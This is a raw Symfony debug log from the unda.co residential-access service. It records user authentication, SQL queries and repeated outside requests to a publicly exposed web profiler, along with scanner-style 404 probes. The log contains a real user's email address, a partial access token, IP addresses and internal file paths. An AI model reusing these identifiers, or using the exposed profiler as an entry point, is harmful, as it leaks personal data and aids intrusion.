[2025-12-21 00:56:15] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:56:15] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:56:15] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:56:15] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:56:15] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:15] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:15] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:56:15] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:15] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:15] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:56:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:56:15] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:56:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"956458","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/956458?panel=router","method":"GET"} []
[2025-12-21 00:56:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-21 00:57:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f76107","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f76107?panel=events","method":"GET"} []
[2025-12-21 00:57:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 01:00:58] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"015ef8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/015ef8/search/results?ip=189.172.56.183&limit=10&method=GET","method":"GET"} []
[2025-12-21 01:00:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=GET","method":"GET"} []
[2025-12-21 01:01:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=security","method":"GET"} []
[2025-12-21 01:01:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 01:04:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=twig","method":"GET"} []
[2025-12-21 01:04:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 01:06:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-21 01:07:01] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"be121b","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/be121b","method":"GET"} []
[2025-12-21 01:14:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 01:16:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-21 01:16:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-21 01:18:17] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-21 01:18:17] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 01:18:17] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 01:18:17] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 01:18:17] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 01:18:17] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 01:18:17] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 01:18:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-21 01:18:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e4df","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e4df?panel=form","method":"GET"} []
[2025-12-21 01:18:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-21 01:21:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 01:23:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=twig","method":"GET"} []
[2025-12-21 01:23:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 01:25:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /news_sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /news_sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 01:27:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"639e42","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/639e42/search/results?ip=66.249.72.70&limit=10","method":"GET"} []
[2025-12-21 01:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=66.249.72.70&limit=10","method":"GET"} []
[2025-12-21 01:28:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 01:29:48] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FAppBundle&line=0","method":"GET"} []
[2025-12-21 01:32:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=form","method":"GET"} []
[2025-12-21 01:32:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-21 01:32:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7478c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7478c3?panel=cache","method":"GET"} []
[2025-12-21 01:32:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 01:34:13] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FHona%2FWebBundle&line=0","method":"GET"} []
[2025-12-21 01:38:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SDK/webLanguage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SDK/webLanguage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 01:38:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"79f5c0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/79f5c0?panel=form","method":"GET"} []
[2025-12-21 01:38:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-21 01:38:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=cache","method":"GET"} []
[2025-12-21 01:38:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 01:38:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 01:40:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=dump","method":"GET"} []
[2025-12-21 01:40:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-21 01:40:55] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 01:40:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 01:42:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 01:43:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"22b906","_route":"_profiler"},"request_uri":"https://admin.unda.co/_profiler/22b906","method":"GET"} []
[2025-12-21 01:43:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-21 01:43:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 01:43:03] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-21 01:43:03] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-21 01:43:03] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-21 01:43:03] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-21 01:43:05] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2F22b906","method":"GET"} []
[2025-12-21 01:43:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 01:45:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=time","method":"GET"} []
[2025-12-21 01:45:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 01:46:07] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b025a3","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b025a3/search/results?ip=109.237.103.123&limit=10&method=GET","method":"GET"} []
[2025-12-21 01:46:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=109.237.103.123&limit=10&method=GET","method":"GET"} []
[2025-12-21 01:46:45] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-21 01:47:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=time","method":"GET"} []
[2025-12-21 01:47:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 01:48:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 01:50:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7408d6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7408d6","method":"GET"} []
[2025-12-21 01:50:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 01:51:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e70caf","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e70caf","method":"GET"} []
[2025-12-21 01:51:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 01:52:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e70caf","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/e70caf/search/results?ip=66.249.75.197&limit=10","method":"GET"} []
[2025-12-21 01:52:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.197&limit=10","method":"GET"} []
[2025-12-21 01:56:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-21 01:56:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
[2025-12-21 02:00:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d40cdc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d40cdc","method":"GET"} []
[2025-12-21 02:00:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:04:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=security","method":"GET"} []
[2025-12-21 02:04:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 02:05:06] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10&method=GET","method":"GET"} []
[2025-12-21 02:05:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&method=GET","method":"GET"} []
[2025-12-21 02:05:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"134486","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/134486","method":"GET"} []
[2025-12-21 02:05:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
